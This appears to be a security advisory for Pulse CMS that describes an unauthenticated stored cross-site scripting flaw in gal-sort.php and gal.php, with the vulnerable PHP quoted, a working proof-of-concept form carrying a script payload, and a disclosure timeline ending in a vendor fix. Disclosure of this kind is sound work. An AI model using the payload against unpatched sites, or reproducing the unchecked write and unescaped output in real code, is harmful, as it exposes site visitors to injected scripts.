login.php is not included inside pulse\admin\inc\gal-sort.php so anyone can access this file.
So we control ../../content/media/". $gallery ."/gallery.txt content.
File: pulse\admin\inc\gal-sort.php
if(!empty($_POST['gallery']) && !empty($_POST['one'])) {
$gallery = $_POST['gallery'];
$order = $_POST['one'];
$taken = array();
$opFile = "../../content/media/". $gallery ."/gallery.txt";
$open = fopen($opFile,"w");
if ($open) {
$data = fwrite($open, $new_data);
fclose($open);
}
}Because datas from gallery.txt are used in gallery we can put XSS there.
File: pulse\inc\tags\gal.php
$opFile = "content/media/". $galdir ."/gallery.txt";
if (file_exists($opFile)) {
$fp = fopen($opFile,"r");
$data = @fread($fp, filesize($opFile));
fclose($fp);
$line = explode("\n", $data);
foreach($line as $test){
if(!empty($test)){
$test_line[] = explode("|", $test);
}
}
foreach ($test_line as $t){
$image = "content/media/$galdir/".$t[0];
$info = pathinfo($image);
$ext = $info['extension'];
if ($ext != 'txt' || empty($ext)){
$taken[] = $image;
echo "<a title='$t[2]' href='$image'><img src='inc/plugins/timthumb.php?src=$path/$image&h=$thumbnail_height&w=$thumbnail_width'></a>";
}
}
}Proof of Concept
<form method="post" action="http://pulsecms-url/admin/inc/gal-sort.php">
Gallery name: <input type="text" name="gallery">
XSS: <input type="text" name="one[999]" value="'></a><script>alert("XSS");</script>">
<input type="submit" value="Hack!">
</form>
XSS will be visible on the page where gallery is displayed.
Timeline
- 26-11-2014: Discovered
- 26-11-2014: Vendor notified
- 27-11-2014: Version 4.2.1 released, issue resolved
